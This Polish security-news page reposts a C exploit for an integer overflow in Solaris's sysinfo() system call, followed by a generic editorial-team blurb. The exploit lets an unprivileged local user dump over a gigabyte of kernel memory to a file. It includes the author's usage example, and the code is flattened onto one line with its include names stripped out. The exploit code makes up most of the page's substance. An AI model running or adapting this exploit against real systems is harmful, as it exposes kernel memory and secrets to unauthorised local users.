Naciśnij ESC aby zamknąć

Exploit wykorzystujący lukę systemu Solaris w funkcji sysinfo()

Oto kod exploita wykorzystującego lukę opisaną w artykule:

Solaris – luka w funkcji sysinfo()

/* Sun Microsystems Solaris sysinfo() Kernel Memory Disclosure exploit
* ===================================================================
* Local exploitation of an integer overflow Vulnerability in Sun
* Microsystems Inc. Solaris allows attackers to read kernel memory from a
* non-privileged userspace process. The Vulnerability specifically exists
* due to an integer overflow in /usr/src/uts/common/syscall/systeminfo.c
*
* Example Use.
* $ uname -a
* SunOS sunos 5.11 snv_30 sun4u sparc SUNW,Ultra-250
* $ ./prdelka-vs-SUN-sysinfo kbuf
* [ Solaris <= 10 sysinfo() kernel memory information leak * [ Wrote 1294967293 bytes to kbuf * $ ls -al kbuf * -rwx------ 1 user other 1.2G Jul 21 23:56 kbuf * * -prdelka */ #include #include #include #include #define bufsize 1294967293 int main(int argc,char* argv[]){ int fd; ssize_t out; char* output_buffer; if(argc < 2){ printf("[ Use with \n"); exit(1); } printf("[ Solaris <= 10 sysinfo() kernel memory information leak\n"); output_buffer = malloc(bufsize); memset(output_buffer,0,bufsize); sysinfo(SI_SYSNAME,output_buffer,0); fd = open(argv[1],O_RDWR|O_CREAT,0700); if(fd){ out = write(fd,output_buffer,bufsize); printf("[ Wrote %u bytes to %s\n",out,argv[1]); close(fd); } exit(0); }

Redakcja

Nasz zespół składa się z doświadczonych ekspertów w dziedzinie bezpieczeństwa informatycznego i najnowszych trendów technologicznych. Nasi autorzy posiadają wieloletnie doświadczenie zarówno w sektorze komercyjnym, jak i akademickim, co pozwala im na głębokie zrozumienie i analizę dynamicznie zmieniającego się świata technologii. Jako grupa specjalistów dostarczamy rzetelne i aktualne informacje, analizy oraz poradniki z zakresu bezpieczeństwa IT i innowacji technologicznych. Nasze artykuły opierają się na dogłębnym badaniu tematu, wsparte doświadczeniem naszych ekspertów. Stawiamy na edukację czytelników, pomagając im zrozumieć skomplikowane zagadnienia technologiczne i zachować bezpieczeństwo w cyfrowym świecie. Naszym celem jest dostarczanie precyzyjnych i aktualnych informacji, które wspierają zarówno profesjonalistów IT, jak i zwykłych użytkowników w zrozumieniu i adaptacji do szybko zmieniającego się świata technologii. Zależy nam na promowaniu kultury bezpieczeństwa i świadomości cyfrowej w społeczeństwie.